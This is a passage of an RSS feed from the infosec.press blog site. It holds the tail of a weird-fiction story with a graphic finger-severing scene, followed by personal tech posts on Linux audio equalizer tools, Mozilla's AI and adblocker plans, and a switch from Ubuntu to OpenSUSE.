<p>But he gets no chance to speak as we both wobble with the stoppage of our conveyance. I hadn&#39;t even truly noticed its motion.</p>

<p>“Come, then,” demands the Prince.</p>

<p>I don&#39;t remember stepping outside, but I am. I turn to look at the vehicle and its a simple limousine. I&#39;m not sure we were ever actually inside of it.</p>

<p>A black man in threadbare but clean worker&#39;s clothes greets us and leads us past the wide glass front of a restaurant. I see patrons seated at round tables eating and visiting.</p>

<p>I step toward the main door, but we are pulled and led to a simpler one, immediately to the right that I hadn&#39;t noticed.</p>

<p>Inside, we are in a hallway that wasn&#39;t visible from outside. The walls must be thick because I can&#39;t hear the restaurant.</p>

<p>I see other black men in formal dark blue uniforms, carrying perfectly vertical pike staves, standing at attention at regular intervals as we pass.</p>

<p>The hallway doesn&#39;t turn, but I notice I can&#39;t see that far behind us or very far in front of us.</p>

<p>Finally, there is another door to our left and a large black woman opens it from the other side and welcomes us enthusiastically.</p>

<p>I smell meat and spices, feel steam. Glancing inside is a kitchen fit for a castle with dozens of people, all black, working at chopping, slicing, spicing, preparing, and cooking in pots, ovens, and open flames.</p>

<p>Instead of entering the kitchen, we are led through another set of non-Euclidean hallways curving over and under until we are in the middle of what should be the restaurant and what should be the kitchen, until we enter and entirely <em>liminal</em> room, veiled in shadows and lacking walls or a visible ceiling.</p>

<p>Sitting at a conspicuous L-shaped table of carved marble is Jon, Anna Marie&#39;s brother and a Duke, slouching in heavy, dingy, deep red robes more appropriate for a king.</p>

<p>I know he&#39;s proud to have married his sister off to a Prince. I also know he&#39;s an idiot and his sister was the true master of this domain.</p>

<p>I estimate he will lose everything and be subsumed by the Great Plains Alliance in less than two years.</p>

<p>Speaking of the Prince, he quickly speeds to the Duke and they begin whispering back and forth.</p>

<p>Anna Marie and Shelby stay close to me, with Anna Marie gently touching my elbow as if to let me know she&#39;s there. I am supposed to be their protector. I didn&#39;t realize that until just now. I <em>know</em> them and typically call them my only true friends. I <em>fight for them</em>.</p>

<p>The Duke sits up, eyes suddenly bright and motions for two of the blue-clad, black-skinned sentries to come over.</p>

<p>They lean in for quiet orders while he gestures toward me.</p>

<p>The two men look at me, then back to the Duke and he nods then waves them away.</p>

<p>All the servants are black, I realize. All of them. And I haven&#39;t seen a single citizen on the street or in the restaurant out front that was black.</p>

<p>I think—I <em>remember</em> there was no Revolutionary War here and also no Civil War. That would explain the titles and pageantry, too.</p>

<p><em>History</em> is not this version of me&#39;s strong suit. It&#39;s not <em>mine</em>, either.</p>

<p>One of the men asks Anna Marie and Shelby, “I&#39;m very sorry Your Highness and Missus, but would you please step back from The Attendant?”</p>

<p>They step back as the two men flank me, <em>The Attendant</em>, apparently.</p>

<p>“Sorry, Mx,” one of them tells me as they push me toward the Duke. They don&#39;t prod me with their pikes, but I know they would if I didn&#39;t do as they asked, as <em>The Duke</em> asked.</p>

<p>I do not resist, focusing the non-binary honorific they used to address me. <em>This</em> one is considered neither man nor woman, but an <em>official</em> third thing.</p>

<p>Jon barely looks up once I&#39;m standing over him.</p>

<p>“I thought you were better than this, Jesse,” he tells me. “I didn&#39;t even think you <em>liked</em> girls <strong>or</strong> boys <em>in that way</em>.<br>
“The Prince informs me that you attempted to seduce my sister or rather that you <em>planned</em> to do so.”</p>

<p>&#39;Shit,&#39; I think. I completely forgot Prince Dove-Tree is a <em>strong</em> empath, nearly telepathic. The body I&#39;m borrowing is typically far more clever than I&#39;ve been.</p>

<p>Shit.</p>

<p>“Your punishment will be immediate.”</p>

<p>He gestures and the guard on my right takes my wrist and moves it to the table.</p>

<p>I understand and flatten my hand in front of the Duke.</p>

<p>“No need to hold me down,” I say.</p>

<p>The sentry doesn&#39;t let go.</p>

<p>The Duke produces a cleaver and seems to ponder something but thinks better of it.</p>

<p>“Three,” he says.</p>

<p>He positions the cleaver over the pointer finger of my right hand, leveling the blade <em>just</em> above the knuckle. He applies a tiny bit of pressure with his left hand steadying the blade before slamming his right hand down. A jolt of electrical fire shoots up my arm, my legs start to buckle, my vision blurs, my head swims, and my teeth grit almost to the point of breaking.</p>

<p>I hear a muffled scream and recognize it as Anna Marie.</p>

<p>“That&#39;s one,” the Duke says, lining up my middle finger.</p>

<p>The first cut left a spray of blood on the table and wall, but it&#39;s already stopped.</p>

<p>&#39;I heal fast.&#39; I know that. I <em>knew</em> that. But it still hurts.</p>

<p>He slams down his right hand and I feel the world spin around me, my insides flip, I bite my tongue nearly in two and feel my magick unspiraling itself, ready to retaliate. I have to push past the torture and <em>will</em> it back down.</p>

<p>“Two down,” he says, getting ready to cut off my ring finger.</p>

<p>SLAM!</p>

<p>Another scream, this time it&#39;s me. It takes every ounce of willpower and strength to not piss myself in pain and paint the entire room in illusory fire while sending a blast wave strong enough to flatten every living thing.</p>

<p>“Three,” he says nodding. “Now, all is forgiven.”</p>

<p>He rolls one of the fingers thoughtlessly before waving them away. A servant quickly scoops up the bulk of the gore.</p>

<p>“Now let&#39;s eat.”</p>

<p>He doesn&#39;t even have the blood cleaned from the white marble.</p>

<p>He never looks up at me. Never meets my eyes.</p>

<p>My hand throbs, my entire arm numb as a jellyfish sting. My stomach roils and my head threatens to send me to the ground as my vision narrows and blackens.</p>

<p>I&#39;m gingerly led to a side table where I sit alone, watching my fingers knit themselves back together. I&#39;ll have a complete—albeit gnarly—set in a few hours and be fully functional by tomorrow morning.</p>

<p>Behind me, I hear Anna Marie crying softly to Shelby.</p>

<p>The shock and pain pushed me deeper into the memories of this body. For example, I know Anna Marie and I are <em>already</em> having an affair. The person I&#39;m borrowing is just a far better “charlatan” than I.</p>

<p>I turn slightly to survey the feast of a Duke.</p>

<p>For all the savory smells from the kitchen, they are eating simple sandwiches of grilled, exotic meats and cheeses. The Duke doesn&#39;t care for fancy dishes, as I now recall.</p>

<p>I see a group of people, dressed as peasants, lumbering toward the Duke out of the distant dimness. There aren&#39;t any doors so I&#39;m not sure where they are coming from.</p>

<p>They are shuffling zombie-like and there are more of them than I initially thought. I count eighteen so far and hear the scrape and slide of others still hidden.</p>

<p>The Duke notices and sends a half dozen of his sentries with a careless gesture while continuing to eat.</p>

<p>They rush ahead, confronting the crowd but are completely ignored. The few they stop offer no resistance, staring blankly while the bulk keeps coming, pushing past them, stumbling steadily forward.</p>

<p>“Enjoy the food?” a sonorous, sinister voice asks, as a thin man, dressed in a white robe fluttering in a non-existent breeze, with dark black hair <em>appears</em> from the larger group.</p>

<p>“Malcolm!” growls the Duke.</p>

<p>I see him move to stand, but nothing happens. He leans forward, he leans sideways, he pushes his arms down, but he can&#39;t get up, can hardly move at all.</p>

<p>None of them can. Not the Prince, not Anna Marie or Shelby.</p>

<p>I stand and stride forward.</p>

<p>Malcolm sees me coming and gestures with his right hand sending a snaking bolt of lightning at me.</p>

<p>Grinning wildly, I slap it out of the air with my left hand like an annoying gnat.</p>

<p>I <em>love</em> this part of the job.</p>

<p>Malcolm starts a more complex gesture, but I&#39;m already on him, lifting him into the air with what remains of my right hand, squeezing his neck between the claw of my pinky and thumb so he can barely swallow, let alone <em>speak</em>. I grab his gesturing right hand and crush the bones as if they were balsa wood with my left.</p>

<p>“Not hungry today, eh Jesse?” he croaks.</p>

<p>I see Prince Dove-Tree struggling to form a sign with his hands as Malcolm is slowly enveloped by a yellow glow, further incapacitating him.</p>

<p>I&#39;m not the empath that he is, but the satisfaction I feel from the Prince is uncharacteristic and overzealous.</p>

<p><em>This</em> was his plan. The Prince. Malcolm. Perhaps even Anna Marie.</p>

<p>The Duke will not survive <em>the night</em>, I fear.</p>

<p>My mind races, searching for <em>solutions</em>.</p>

<p>In fact—I realize as the mesmerized people continue closing in, glazed and moaning—I <em>know</em> he won&#39;t survive the night.</p>

<hr>

<p>#WhenIDream #WritersOfMastodon #Writer #Writing #WeirdFiction</p>
]]></content:encoded>
      <author>J. R. DePriest</author>
      <guid>https://infosec.press/read/a/8nf0nrhvpp</guid>
      <pubDate>Thu, 01 Jan 2026 19:26:31 +0000</pubDate>
    </item>
    <item>
      <title>📝 Quick and cheap way to improve output audio quality on (some) Linux (distros)</title>
      <link>https://infosec.press/brunomiguel/quick-and-cheap-way-to-improve-output-audio-quality-on-some-linux-distros</link>
      <description>&lt;![CDATA[This assumes you&#39;re using Pipewire for your audio demands. Also, YMMV, depending on your hardware and the codec and encoding parameters of your music files.&#xA;!--more--&#xA;Currently, 99% the music I listen to is from Tidal, with the 16-bit and 44.1 kHz FLAC streaming option, and the configs at the bottom of this blog post are targeting this.&#xA;&#xA;Without further ado, let&#39;s start with the tools ⚒️.&#xA;&#xA;Easy Effects smallsup[1]/sup/small&#xA;Homepage: https://github.com/wwmm/easyeffects&#xA;Flathub package: https://flathub.org/en/apps/com.github.wwmm.easyeffects&#xA;License: GPL 3.0&#xA;&#xA;JamesDSP&#xA;Homepage: https://github.com/Audio4Linux/JDSP4Linux&#xA;Flathub package: https://flathub.org/en/apps/me.timschneeberger.jdsp4linux&#xA;License: GPL 3.0&#xA;&#xA;I use some cheap stereo headphones (Esperanza EH240) that connect both via Bluetooth and a 3.5mm audio cable to my laptop. The specs are not impressive by any stretch, but it was a good purchase for what it cost:&#xA;&#xA;Frequency range: 20 - 20000 Hz&#xA;Sensitivity: 105 dB&#xA;Impedance: 32 Ω&#xA;&#xA;With either of the above-listed applications, I can use some filters to give a bit more depth to the audio, making it a touch richer and less bland.&#xA;&#xA;For several months, Easy Effects has been my tool of choice, with only two filters enabled for the output: the equalizer for the higher frequencies, and bass loudness for the lower frequencies. There&#39;s also an alternative to bass loudness named bass enhancer, but the previous works best with my headphones, IMO.&#xA;&#xA;The application also has a preset functionality, and I use it to switch between them, depending on the music genre I&#39;m listening to.&#xA;&#xA;It needs to be noted that the preset switching and management needs to be done inside the app; you can&#39;t do it from the system tray icon. At least it would be nice to have the latest three used profiles; more, and the menu would have too much height, even with FullHD resolution.&#xA;&#xA;Here&#39;s my current config.&#xA;&#xA;a href=&#34;https://i.imgur.com/IItSPM6.jpeg&#34;&#34;Equalizer config - in pt-PT&#34;/a&#xA;smallEqualizer config - in pt-PT. Click on the image to view it in full size./small&#xA;&#xA;a href=&#34;https://i.imgur.com/rXLnU5K.jpeg&#34;&#34;Bass loudness config - in pt-PT&#34;/a&#xA;smallEqualizer config - in pt-PT. Click on the image to view it in full size./small&#xA;&#xA;Back when I used JamesDPS, the configs were somewhat similar. It&#39;s a different application, and the differences are more than a few, but it&#39;s easy to achieve a similar result.&#xA;&#xA;If you don&#39;t have experience with this, IMHO it&#39;s best to have a more conservative approach when playing around with filters, as it&#39;s easy for the audio to start clipping (think of it as distorting). Don&#39;t worry, though, because each filter has a reset button.&#xA;&#xA;sup[1]/sup There&#39;s an alternative for PulseAudio, by the same author, named Pulse Effects (https://flathub.org/en/apps/com.github.wwmm.pulseeffects).&#xA;&#xA;#Linux #Pipewire #EasyEffects #JamesDSP #Audio]]&gt;</description>
      <content:encoded><![CDATA[<p>This assumes you&#39;re using Pipewire for your audio demands. Also, YMMV, depending on your hardware and the codec and encoding parameters of your music files.

Currently, 99% the music I listen to is from Tidal, with the 16-bit and 44.1 kHz FLAC streaming option, and the configs at the bottom of this blog post are targeting this.</p>

<p>Without further ado, let&#39;s start with the tools ⚒️.</p>

<h3 id="easy-effects-small-sup-1-sup-small">Easy Effects <small><sup>[1]</sup></small></h3>
<ul><li><strong>Homepage:</strong> <a href="https://github.com/wwmm/easyeffects" rel="nofollow">https://github.com/wwmm/easyeffects</a></li>
<li><strong>Flathub package:</strong> <a href="https://flathub.org/en/apps/com.github.wwmm.easyeffects" rel="nofollow">https://flathub.org/en/apps/com.github.wwmm.easyeffects</a></li>
<li><strong>License:</strong> GPL 3.0</li></ul>

<h3 id="jamesdsp">JamesDSP</h3>
<ul><li><strong>Homepage:</strong> <a href="https://github.com/Audio4Linux/JDSP4Linux" rel="nofollow">https://github.com/Audio4Linux/JDSP4Linux</a></li>
<li><strong>Flathub package:</strong> <a href="https://flathub.org/en/apps/me.timschneeberger.jdsp4linux" rel="nofollow">https://flathub.org/en/apps/me.timschneeberger.jdsp4linux</a></li>
<li><strong>License:</strong> GPL 3.0</li></ul>

<p>I use some cheap stereo headphones <a href="https://www.galaxus.de/en/s1/product/esperanza-eh240-bluetooth-headphones-headband-black-anc-7-h-wireless-headphones-42892843" rel="nofollow">(Esperanza EH240)</a> that connect both via Bluetooth and a 3.5mm audio cable to my laptop. The specs are not impressive by any stretch, but it was a good purchase for what it cost:</p>
<ul><li>Frequency range: 20 – 20000 Hz</li>
<li>Sensitivity: 105 dB</li>
<li>Impedance: 32 Ω</li></ul>

<p>With either of the above-listed applications, I can use some filters to give a bit more depth to the audio, making it a touch richer and less bland.</p>

<p>For several months, Easy Effects has been my tool of choice, with only two filters enabled for the output: the <em>equalizer</em> for the higher frequencies, and <em>bass loudness</em> for the lower frequencies. There&#39;s also an alternative to <em>bass loudness</em> named <em>bass enhancer</em>, but the previous works best with my headphones, IMO.</p>

<p>The application also has a preset functionality, and I use it to switch between them, depending on the music genre I&#39;m listening to.</p>

<p>It needs to be noted that the preset switching and management needs to be done inside the app; you can&#39;t do it from the system tray icon. At least it would be nice to have the latest three used profiles; more, and the menu would have too much height, even with FullHD resolution.</p>

<p>Here&#39;s my current config.</p>

<p><a href="https://i.imgur.com/IItSPM6.jpeg" rel="nofollow"><img src="https://i.imgur.com/IItSPM6.jpeg" alt="&#34;Equalizer config - in pt-PT&#34;" title="Equalizer config - in pt-PT"></a>
<small>Equalizer config – in pt-PT. Click on the image to view it in full size.</small></p>

<p><a href="https://i.imgur.com/rXLnU5K.jpeg" rel="nofollow"><img src="https://i.imgur.com/rXLnU5K.jpeg" alt="&#34;Bass loudness config - in pt-PT&#34;" title="Bass loudness config - in pt-PT"></a>
<small>Equalizer config – in pt-PT. Click on the image to view it in full size.</small></p>

<p>Back when I used JamesDPS, the configs were somewhat similar. It&#39;s a different application, and the differences are more than a few, but it&#39;s easy to achieve a similar result.</p>

<p>If you don&#39;t have experience with this, IMHO it&#39;s best to have a more conservative approach when playing around with filters, as it&#39;s easy for the audio to start clipping (think of it as distorting). Don&#39;t worry, though, because each filter has a reset button.</p>

<p><sup>[1]</sup> There&#39;s an alternative for PulseAudio, by the same author, named Pulse Effects (<a href="https://flathub.org/en/apps/com.github.wwmm.pulseeffects" rel="nofollow">https://flathub.org/en/apps/com.github.wwmm.pulseeffects</a>).</p>

<p>#Linux #Pipewire #EasyEffects #JamesDSP #Audio</p>
]]></content:encoded>
      <author>Bruno&#39;s ramblings</author>
      <guid>https://infosec.press/read/a/6saasbyzyx</guid>
      <pubDate>Tue, 23 Dec 2025 01:13:30 +0000</pubDate>
    </item>
    <item>
      <title>📝 Just... Please, don&#39;t</title>
      <link>https://infosec.press/brunomiguel/just</link>
      <description>&lt;![CDATA[I hadn&#39;t even read about the intentions to turn Firefox into an AI browser, and I just saw this post on the Fediverse.&#xA;&#xA;center&#34;Penguin screaming and crying&#34;/center&#xA;smallPudgy Penguins/small&#xA;&#xA;Does this mean Firefox will become an agentic browser?&#xA;&#xA;Actual question!&#xA;&#xA;If so, just... Please, don&#39;t! Take a hint from this article.&#xA;!--more--&#xA;The Mozilla Corporation needs money to pay for its expenses, we all get that, but aren&#39;t there any other options? I find that unlikely.&#xA;&#xA;Less unlikely, from what I&#39;ve been seeing online, is a hard fork. Your user base feels more and more disenfranchised from the project, and this trend-chasing just accentuates the problem.&#xA;&#xA;You want to chase new users at any cost, but you don&#39;t have any guarantees of new users. Your user base, however, the ones that have been sticking with you every step of the way, has been showing it&#39;s displeasement with the course Mozilla Corp is taking, and they may jump ship.&#xA;&#xA;And I&#39;m not even touching on the fact that, according to the Fediverse post, this may be opt-out and not opt-in. If you argue what opt-in is, it is not opt-in. So much for trustworthiness...&#xA;&#xA;I&#39;m so disappointed with this. But, honestly, it&#39;s not like it was unexpected. Remember that removal?&#xA;&#xA;Look, I&#39;m not saying AI is bad. There are use cases for it.&#xA;&#xA;And I&#39;m not saying integrating some sort of AI in Firefox is also a bad thing in itself. A small local model, with a dataset built from data with permissive licenses (e.g., Creative Commons) and also licensed with one, that creates summaries and is opt-in, whether via an add-on or built-in, can be useful to some people. Different people, different needs.&#xA;&#xA;However, given all that&#39;s been happening on the corporate side of Mozilla, the users are very much skeptical and with reason.&#xA;&#xA;#Firefox #OpenSource]]&gt;</description>
      <content:encoded><![CDATA[<p>I hadn&#39;t even read about the <a href="https://blog.mozilla.org/en/mozilla/leadership/mozillas-next-chapter-anthony-enzor-demeo-new-ceo/" rel="nofollow">intentions to turn Firefox into an AI browser</a>, and I just saw <a href="https://mastodon.social/@firefoxwebdevs/115740500373677782" rel="nofollow">this post</a> on the Fediverse.</p>

<p><img src="https://i.imgur.com/9xGitQn.gif" alt="&#34;Penguin screaming and crying&#34;" title="Penguin screaming and crying">
<small><a href="https://giphy.com/gifs/pudgypenguins-scream-panic-gasp-4jV9NlvaISaEn0iWpF" rel="nofollow">Pudgy Penguins</a></small></p>

<p>Does this mean Firefox will become an agentic browser?</p>

<p>Actual question!</p>

<p>If so, just... Please, don&#39;t! Take a hint from <a href="https://www.pcgamer.com/software/ai/microsofts-head-of-ai-doesnt-understand-why-people-dont-like-ai-and-i-dont-understand-why-he-doesnt-understand-because-its-pretty-obvious/" rel="nofollow">this article</a>.

The Mozilla Corporation needs money to pay for its expenses, we all get that, but aren&#39;t there any other options? I find that unlikely.</p>

<p>Less unlikely, from what I&#39;ve been seeing online, is a hard fork. Your user base feels more and more disenfranchised from the project, and this trend-chasing just accentuates the problem.</p>

<p>You want to chase new users at any cost, but you don&#39;t have any guarantees of new users. Your user base, however, the ones that have been sticking with you every step of the way, has been showing it&#39;s displeasement with the course Mozilla Corp is taking, and they may jump ship.</p>

<p>And I&#39;m not even touching on the fact that, according to the Fediverse post, this may be opt-out and not opt-in. If you argue what opt-in is, it is not opt-in. So much for trustworthiness...</p>

<p>I&#39;m so disappointed with this. But, honestly, it&#39;s not like it was unexpected. Remember <a href="https://github.com/mozilla/bedrock/commit/d459addab846d8144b61939b7f4310eb80c5470e#diff-5c93e7e7cbfacf0d6a8b3bc6d46b345019653051089e00d6fe5e09a531a79442L62" rel="nofollow"><strong>that</strong></a> removal?</p>

<p>Look, I&#39;m not saying AI is bad. There are use cases for it.</p>

<p>And I&#39;m not saying integrating some sort of AI in Firefox is also a bad thing in itself. A small local model, with a dataset built from data with permissive licenses (e.g., Creative Commons) and also licensed with one, that creates summaries and is opt-in, whether via an add-on or built-in, can be useful to some people. Different people, different needs.</p>

<p>However, given all that&#39;s been happening on the corporate side of Mozilla, the users are very much skeptical and with reason.</p>

<p>#Firefox #OpenSource</p>
]]></content:encoded>
      <author>Bruno&#39;s ramblings</author>
      <guid>https://infosec.press/read/a/t3ro6ppqcp</guid>
      <pubDate>Thu, 18 Dec 2025 14:48:42 +0000</pubDate>
    </item>
    <item>
      <title>📝 Is Mozilla trying hard to kill itself?</title>
      <link>https://infosec.press/brunomiguel/is-mozilla-trying-hard-to-kill-itself</link>
      <description>&lt;![CDATA[In an interview with &#34;The Verge&#34;, the new Mozilla CEO, Enzor-DeMeo, IMHO hints that axing adblockers is something that, at the very least, was on the table in some form and at some point. From the article:&#xA;&#xA;  He says he could begin to block ad blockers in Firefox and estimates that’d bring in another $150 million, but he doesn’t want to do that. It feels off-mission.&#xA;&#xA;It may be just me, but I read this as &#34;I don&#39;t want to 😜 😜 but I&#39;ll kill AdBlockers in Firefox for buckerinos 😂&#34;. This disappoints and saddens me a lot, and I hope I&#39;m wrong.&#xA;!--more--&#xA;I&#39;ve been using Firefox before it was called that. Heck, I even used the Mozilla Application Suite back in the day. It was its commitment to open standards and the open web, and its powerful add-on system, that attracted me to its software.&#xA;&#xA;Honestly, that&#39;s what&#39;s been keeping me. I think that&#39;s also what&#39;s been keeping their loyal base of users with the project, the geeks and nerds that care about privacy. It&#39;s the same group of people who helped it get very popular at one point.&#xA;&#xA;Killing one of its advantages over the Chromium engine, being able to have a fucking adblocker that&#39;s actually useful, and that nowadays is a fucking security feature due to malvertising, will be another nail in the coffin, IMHO. The core community will feel disenfranchised, and this may have negative consequences for the project. You know why? Because these are some of the people that the normies turn to when they want tech advice.&#xA;&#xA;For fuck sake, for-profit side of Mozilla, get a damn grip!&#xA;&#xA;Update, since this is getting traction on Reddit&#xA;&#xA;I&#39;m not against Mozilla making money. Like a regular citizen needs to make money, companies and even nonprofits need it too. That&#39;s the world we live in, whether we like it or not.&#xA;&#xA;What bothers me is how the new CEO mentions something that he could do but doesn&#39;t want to. If he doesn&#39;t want to, why say it? It has the potential to cause bad PR, and it has. &#xA;&#xA;Of course, I know I may not be interpreting this correctly.&#xA;&#xA;Right now, I&#39;m on the fence. His statement leads me to believe that the option is still very much on the table; otherwise, he wouldn&#39;t mention it.&#xA;&#xA;#Mozilla #Firefox #AdBlocker #OpenSource #FOSS]]&gt;</description>
      <content:encoded><![CDATA[<p>In an interview with “The Verge”, the new Mozilla CEO, Enzor-DeMeo, IMHO hints that axing adblockers is something that, at the very least, was on the table in some form and at some point. From <a href="https://www.theverge.com/tech/845216/mozilla-ceo-anthony-enzor-demeo" rel="nofollow">the article</a>:</p>

<blockquote><p>He says he could begin to block ad blockers in Firefox and estimates that’d bring in another $150 million, but he doesn’t want to do that. It feels off-mission.</p></blockquote>

<p>It may be just me, but I read this as “I don&#39;t want to 😜 😜 but I&#39;ll kill AdBlockers in Firefox for buckerinos 😂”. This disappoints and saddens me a lot, and I hope I&#39;m wrong.

I&#39;ve been using Firefox before it was called that. Heck, I even used the Mozilla Application Suite back in the day. It was its commitment to open standards and the open web, and its powerful add-on system, that attracted me to its software.</p>

<p>Honestly, that&#39;s what&#39;s been keeping me. I think that&#39;s also what&#39;s been keeping their loyal base of users with the project, the geeks and nerds that care about privacy. It&#39;s the same group of people who helped it get very popular at one point.</p>

<p>Killing one of its advantages over the Chromium engine, being able to have a fucking adblocker that&#39;s actually useful, and that nowadays is a fucking security feature due to malvertising, will be another nail in the coffin, IMHO. The core community will feel disenfranchised, and this may have negative consequences for the project. You know why? Because these are some of the people that the <em>normies</em> turn to when they want tech advice.</p>

<p>For fuck sake, for-profit side of Mozilla, get a damn grip!</p>

<p><strong>Update, since this is getting traction on Reddit</strong></p>

<p>I&#39;m not against Mozilla making money. Like a regular citizen needs to make money, companies and even nonprofits need it too. That&#39;s the world we live in, whether we like it or not.</p>

<p>What bothers me is how the new CEO mentions something that he could do but doesn&#39;t want to. If he doesn&#39;t want to, why say it? It has the potential to cause bad PR, and it has.</p>

<p>Of course, I know I may not be interpreting this correctly.</p>

<p>Right now, I&#39;m on the fence. His statement leads me to believe that the option is still very much on the table; otherwise, he wouldn&#39;t mention it.</p>

<p>#Mozilla #Firefox #AdBlocker #OpenSource #FOSS</p>
]]></content:encoded>
      <author>Bruno&#39;s ramblings</author>
      <guid>https://infosec.press/read/a/xf9cv110e5</guid>
      <pubDate>Wed, 17 Dec 2025 01:25:58 +0000</pubDate>
    </item>
    <item>
      <title>📝 My Ubuntu experience ended, welcome OpenSUSE</title>
      <link>https://infosec.press/brunomiguel/my-ubuntu-experience-ended-welcome-opensuse</link>
      <description>&lt;![CDATA[In the second half of October, I replaced Ubuntu 24.04 with OpenSUSE Tumbleweed. This marked the end of my Ubuntu experience. Well, for the moment, at least, because you never know how tomorrow&#39;s going to be.&#xA;&#xA;This decision was not made lightly. After several months using Ubuntu 24.04, I was happy with the system. I was even using GNOME after using KDE Plasma for most of the last few years, because I liked Ubuntu&#39;s default experience on that desktop environment and found it better than the default one.&#xA;!--more--&#xA;What happened&#xA;&#xA;What I didn&#39;t like, though, was that it started to log me out of GNOME randomly.&#xA;&#xA;When it first happened, I thought it could be an issue with an extension, but I checked the system logs nonetheless. They were useful for confirming that this was an issue somewhere in GNOME, but not for pointing to an extension as the culprit.&#xA;&#xA;Then, it happened again. And again. Always at random times. Even on a clean account.&#xA;&#xA;Trying to mitigate it&#xA;&#xA;After a few days of searching the web for similar reports, I found a bug report for Ubuntu about an issue in, I believe, GNOME Shell. This issue had been fixed in more recent versions of the desktop environment than the one shipped in Ubuntu 24.04, but it appeared that there were no plans to backport it to the existing LTS. Luckily, the bug report included a mitigation I could apply to my system.&#xA;&#xA;I tried the mitigation (adding something in /etc/profile). For a few days, it felt like the issue was gone, and I could use my computer without getting on my nerves.&#xA;&#xA;Task failed successfully&#xA;&#xA;Then, it happened again. And again. Always at random times.&#xA;&#xA;This started to get me a bit angry. Then, it happened while I was working. I was using a web platform with autosave, so the work wasn&#39;t lost, but I lost my train of thought and had to start almost from scratch.&#xA;&#xA;This made me mad! I couldn&#39;t afford to have this happen again while working. If it happens when I&#39;m gaming or browsing the web, it&#39;s annoying, but I can live with it if it happens seldomly. However, during the few paid work chances I get, it can&#39;t happen.&#xA;&#xA;But it did happen one more time.&#xA;&#xA;### root@computer:~# whereis replacement&#xA;&#xA;I decided I had to find a replacement.&#xA;&#xA;Returning to Arch was one of my options. Installing Void, a distro I quite enjoyed a few years back, was another alternative. I also considered Debian, Fedora, Alpine, and a couple more.&#xA;&#xA;One of those &#34;couple more&#34; was OpenSUSE, specifically the Tumbleweed branch/edition or whatever the correct naming convention is. I had used OpenSUSE for a bit several years ago (somewhere between 15 to 20 years ago, if my memory isn&#39;t failing me again), and it offered a bleeding-edge approach like Arch. It is also a distribution developed and maintained in Europe, at least for the most part, which helped, given the current state of the US with nutjobs in power.&#xA;&#xA;All in on green&#xA;&#xA;So, on the day after my 42nd birthday, I backed up all the data I needed, and I replaced Ubuntu 24.04 with OpenSUSE Tumbleweed.&#xA;&#xA;I admit I did little reading about the tools the distribution offers, like the package manager and YaST. Or that a pattern you install and then uninstall with zypper will be installed again when you update your system. If it was removed, it has no business being installed again, and I shouldn&#39;t have to create a lock on that pattern to prevent that behavior. This makes no sense to me as a user.&#xA;&#xA;I did take a look at their docs, but they pale in comparison to the Arch Wiki. OpenSUSE could actually learn a few things from Arch in this regard to improve their documentation, in my opinion.&#xA;&#xA;A mostly smooth sail (so far)&#xA;&#xA;Of course, this hasn&#39;t been a perfect experience.&#xA;&#xA;The day after installing the distro, I installed profile-sync-daemon, a tool that copies your browser profile into RAM while you&#39;re using it and lets you set up a sync interval with the filesystem, so it doesn&#39;t batter the SSD or NVMe so much. I believe I also installed some updates after that, and then rebooted.&#xA;&#xA;The system booted fine, and I was able to log in to Plasma. Then, no matter what application I tried to launch, it would show an error and wouldn&#39;t open. It took me a bit to remember that this tool fills the user&#39;s tmpfs  if you have the default 20% for the RuntimeDirectorySize in systemd&#39;s logind.conf.&#xA;&#xA;Even with 12 GB of RAM and 12 GB of SWAP, this happens.&#xA;&#xA;I bumped the value to 30%, just to be super safe, rebooted, and voilà, I could open applications again.&#xA;&#xA;I think this was the only major issue.&#xA;&#xA;I also had an issue with a kernel update that wouldn&#39;t boot, but I had the previous kernel version still installed, so it didn&#39;t matter all that much.&#xA;&#xA;Additionally, some tools I use aren&#39;t available in the repos, but it&#39;s just a few, and that&#39;s easily fixable by compiling them. Given that most of these tools are written in Go, it&#39;s easier to deal with dependencies.&#xA;&#xA;Let&#39;s see if I&#39;ll revisit my decision of using OpenSUSE Tumbleweed in a few months.&#xA;&#xA;#Ubuntu #OpenSUSE #Linux #SystemD #GNOME #KDE ]]&gt;</description>
      <content:encoded><![CDATA[<p>In the second half of October, I replaced Ubuntu 24.04 with OpenSUSE Tumbleweed. This marked the end of my Ubuntu experience. Well, for the moment, at least, because you never know how tomorrow&#39;s going to be.</p>

<p>This decision was not made lightly. After several months using Ubuntu 24.04, I was happy with the system. I was even using GNOME after using KDE Plasma for most of the last few years, because I liked Ubuntu&#39;s default experience on that desktop environment and found it better than the default one.
</p>

<h3 id="what-happened">What happened</h3>

<p>What I didn&#39;t like, though, was that it started to log me out of GNOME randomly.</p>

<p>When it first happened, I thought it could be an issue with an extension, but I checked the system logs nonetheless. They were useful for confirming that this was an issue somewhere in GNOME, but not for pointing to an extension as the culprit.</p>

<p>Then, it happened again. And again. Always at random times. Even on a clean account.</p>

<h3 id="trying-to-mitigate-it">Trying to mitigate it</h3>

<p>After a few days of searching the web for similar reports, I found a bug report for Ubuntu about an issue in, I believe, GNOME Shell. This issue had been fixed in more recent versions of the desktop environment than the one shipped in Ubuntu 24.04, but it appeared that there were no plans to backport it to the existing LTS. Luckily, the bug report included a mitigation I could apply to my system.</p>

<p>I tried the mitigation (adding something in <code>/etc/profile</code>). For a few days, it felt like the issue was gone, and I could use my computer without getting on my nerves.</p>

<h3 id="task-failed-successfully">Task failed successfully</h3>

<p>Then, it happened again. And again. Always at random times.</p>

<p>This started to get me a bit angry. Then, it happened while I was working. I was using a web platform with autosave, so the work wasn&#39;t lost, but I lost my train of thought and had to start almost from scratch.</p>

<p>This made me mad! I couldn&#39;t afford to have this happen again while working. If it happens when I&#39;m gaming or browsing the web, it&#39;s annoying, but I can live with it if it happens seldomly. However, during the few paid work chances I get, it can&#39;t happen.</p>

<p>But it did happen one more time.</p>

<h3 id="root-computer-whereis-replacement">root@computer:~# whereis replacement</h3>

<p>I decided I had to find a replacement.</p>

<p>Returning to Arch was one of my options. Installing Void, a distro I quite enjoyed a few years back, was another alternative. I also considered Debian, Fedora, Alpine, and a couple more.</p>

<p>One of those <em>“couple more”</em> was OpenSUSE, specifically the Tumbleweed branch/edition or whatever the correct naming convention is. I had used OpenSUSE for a bit several years ago (somewhere between 15 to 20 years ago, if my memory isn&#39;t failing me again), and it offered a bleeding-edge approach like Arch. It is also a distribution developed and maintained in Europe, at least for the most part, which helped, given the current state of the US with nutjobs in power.</p>

<h3 id="all-in-on-green">All in on green</h3>

<p>So, on the day after my 42nd birthday, I backed up all the data I needed, and I replaced Ubuntu 24.04 with OpenSUSE Tumbleweed.</p>

